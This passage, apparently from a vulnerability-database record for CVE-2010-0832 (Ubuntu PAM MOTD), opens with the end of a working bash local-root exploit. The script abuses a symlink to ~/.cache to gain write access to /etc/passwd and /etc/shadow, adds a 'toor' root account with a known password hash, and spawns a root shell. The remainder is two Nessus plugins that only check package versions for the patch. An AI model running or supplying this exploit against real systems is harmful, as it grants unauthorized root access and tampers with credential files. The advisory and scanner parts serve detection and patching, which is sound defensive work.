groupes=0(root)\r\n#\r\nP='toor:x:0:0:root:/root:/bin/bash'\r\nS='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'\r\necho "[*] Ubuntu PAM MOTD local root"\r\n[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1\r\n[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1\r\n[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1\r\nbackup() {\r\n [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak\r\n [ -e "$1" ] || return 0\r\n mv "$1"{,.bak} || return 1\r\n echo "[*] Backuped $1"\r\n}\r\nrestore() {\r\n [ -e "$1" ] && rm -rf "$1"\r\n [ -e "$1".bak ] || return 0\r\n mv "$1"{.bak,} || return 1\r\n echo "[*] Restored $1"\r\n}\r\nkey_create() {\r\n backup ~/.ssh/authorized_keys\r\n ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1\r\n [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }\r\n mv "$KEY.pub" ~/.ssh/authorized_keys || return 1\r\n echo "[*] SSH key set up"\r\n}\r\nkey_remove() {\r\n rm -f "$KEY"\r\n restore ~/.ssh/authorized_keys\r\n echo "[*] SSH key removed"\r\n}\r\nown() {\r\n [ -e ~/.cache ] && rm -rf ~/.cache\r\n ln -s "$1" ~/.cache || return 1\r\n echo "[*] spawn ssh"\r\n ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true\r\n [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }\r\n echo "[+] owned: $1"\r\n}\r\nbye() {\r\n key_remove\r\n exit 1\r\n}\r\nKEY="$(mktemp -u)"\r\nkey_create || { echo "[-] Failed to setup SSH key"; exit 1; }\r\nbackup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }\r\nown /etc/passwd && echo "$P" >> /etc/passwd\r\nown /etc/shadow && echo "$S" >> /etc/shadow\r\nrestore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }\r\nkey_remove\r\necho "[+] Success! Use password toor to get root"\r\nsu -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \\\r\n chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor\r\n\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69376"}], "nessus": [{"lastseen": "2021-01-01T06:57:35", "description": "USN-959-1 fixed vulnerabilities in PAM. This update provides the\ncorresponding updates for Ubuntu 10.10.\n\nDenis Excoffier discovered that the PAM MOTD module in Ubuntu did not\ncorrectly handle path permissions when creating user file stamps. A\nlocal attacker could exploit this to gain root privilieges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2010-10-26T00:00:00", "title": "Ubuntu 10.10 : pam vulnerability (USN-959-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpam-cracklib", "p-cpe:/a:canonical:ubuntu_linux:libpam0g", "p-cpe:/a:canonical:ubuntu_linux:libpam-doc", "p-cpe:/a:canonical:ubuntu_linux:libpam-modules", "p-cpe:/a:canonical:ubuntu_linux:libpam-runtime", "cpe:/o:canonical:ubuntu_linux:10.10", "p-cpe:/a:canonical:ubuntu_linux:libpam0g-dev"], "id": "UBUNTU_USN-959-2.NASL", "href": "https://www.tenable.com/plugins/nessus/50342", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-959-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50342);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2010-0832\");\n script_bugtraq_id(41465);\n script_xref(name:\"USN\", value:\"959-2\");\n\n script_name(english:\"Ubuntu 10.10 : pam vulnerability (USN-959-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-959-1 fixed vulnerabilities in PAM. This update provides the\ncorresponding updates for Ubuntu 10.10.\n\nDenis Excoffier discovered that the PAM MOTD module in Ubuntu did not\ncorrectly handle path permissions when creating user file stamps. A\nlocal attacker could exploit this to gain root privilieges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/959-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-cracklib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam0g\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam0g-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam-cracklib\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam-doc\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam-modules\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam-runtime\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam0g\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libpam0g-dev\", pkgver:\"1.1.1-4ubuntu2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpam-cracklib / libpam-doc / libpam-modules / libpam-runtime / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:57:35", "description": "Denis Excoffier discovered that the PAM MOTD module in Ubuntu did not\ncorrectly handle path permissions when creating user file stamps. A\nlocal attacker could exploit this to gain root privilieges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2010-07-08T00:00:00", "title": "Ubuntu 9.10 / 10.04 LTS : pam vulnerability (USN-959-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpam-cracklib", "p-cpe:/a:canonical:ubuntu_linux:libpam0g", "p-cpe:/a:canonical:ubuntu_linux:libpam-doc", "p-cpe:/a:canonical:ubuntu_linux:libpam-modules", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libpam-runtime", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:libpam0g-dev"], "id": "UBUNTU_USN-959-1.NASL", "href": "https://www.tenable.com/plugins/nessus/47679", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-959-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47679);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2010-0832\");\n script_xref(name:\"USN\", value:\"959-1\");\n\n script_name(english:\"Ubuntu 9.10 / 10.04 LTS : pam vulnerability (USN-959-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Denis Excoffier discovered that the PAM MOTD module in Ubuntu did not\ncorrectly handle path permissions when creating user file stamps. A\nlocal attacker could exploit this to gain root privilieges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/959-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-cracklib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam0g\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam0g-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(9\\.10|10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.10 / 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam-cracklib\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam-doc\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam-modules\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam-runtime\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam0g\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpam0g-dev\", pkgver:\"1.1.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam-cracklib\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam-doc\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam-modules\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam-runtime\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam0g\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libpam0g-dev\", pkgver:\"1.1.1-2ubuntu5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpam-cracklib / libpam-doc / libpam-modules / libpam-runtime / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}]}
